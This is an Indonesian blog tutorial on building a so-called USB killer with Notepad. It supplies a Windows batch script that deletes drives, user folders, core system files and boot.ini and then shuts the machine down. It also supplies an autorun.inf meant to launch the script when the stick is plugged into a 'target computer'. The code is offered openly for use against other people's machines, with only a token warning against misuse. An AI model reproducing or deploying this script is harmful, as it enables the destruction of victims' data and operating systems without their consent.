Cara Membuat USB Killer Di Notepad

Cara Membuat USB Killer Di Notepad

Hasil gambar untuk usb killer

Asalamualaikum wr wb guys, yup di saat hari puasa terakhir ini saya akan membagikan tutor cara mudah membuat usbkiller sendiri di notepad, Nah apa sih pengertian dari USB itu?? Simak pengertiannya baik² di sini.

Pengertian USB :

USB (Universal Serial Bus) adalah standart bus serial yang mempunyai fungsi menghubungkan suatu perangkat atau periperal komputer seperti keyboard, mouse, joystick, webcam, printer, scanner, ke komputer induk. USB memiliki kemampuan plug ‘n’ play dan juga mendukung “hot swapping”, dimana kita bisa mencopot atau memasang device lain melalui konektor tersebut tanpa harus melakukan booting ulang. Fitur lain dari USB yang bisa kita dapatkan adalah daya yang diperlukan sangat kecil dan kita tidak memerlukan daya tambahan lagi.

USB Killer 2.0 dijual dengan harga49.95 Euro atau sekitar Rp740.000. Mereka mengklaim bahwa USB Killer 2.0 sukses membakar 95% komputer targetnya. Nah Mahal banget kan? Itu pun baru versi yang 2.0 belom yang versi 3.0, Nah untuk itu saya akan meberikan tutor cara membuat usb killer dengan mudah di notepad.

Untuk bahan² yang di perlukan adalah :

-Hp/Pc 

-Notepad

-USB kosong (jika di android USB+OTG)

Pertama kita masuk ke notepad.

Lalu siapkan virus, Disini virus nya terserah kalian , Kan ini pake notepad jadi kalian pikir dah virus mana yg cocok untuk usbkiller, klo yang belom punya bisa copy virus di bawah ini, setelah itu simpan dengan format.bat, contoh USBkiller.bat


@echo off Echo Mr.9.5.9 attack your system 3... 2... 1... dir d: echo Y|del D:\ dir c: echo Y|del C:\documents and settings echo Y|del C:\users echo Y|del C:\windows\system32\hal.dll echo Y|del C:\windows attrib -s -h C:\boot.ini PING localhost -n 1 -w 3 >NUL echo Y|del C:\boot.ini echo Y|del C:\ PING localhost -n 1 -w 6 >NUL shutdown.exe -s -t 30

Lalu kita copas Script auto run nya

[autorun] ;Open=(NamaVirusLu).Bat 
ShellExecute=(NamaVirusLu).Bat 
UseAutoPlay=1

Setelah itu kita save dengan Nama AutoRun.inf

Jika Sudah dibuat semua kita masukkan file nya di usb kalian , setelah itu tinggal masukkan usb kalian ke komputer target.

Nah itu saja tutornya dari saya, ingatya tutor ini jangan di salah gunakan, sekian dari saya wasalamualaikum wr wb. 

Post a Comment

0 Comments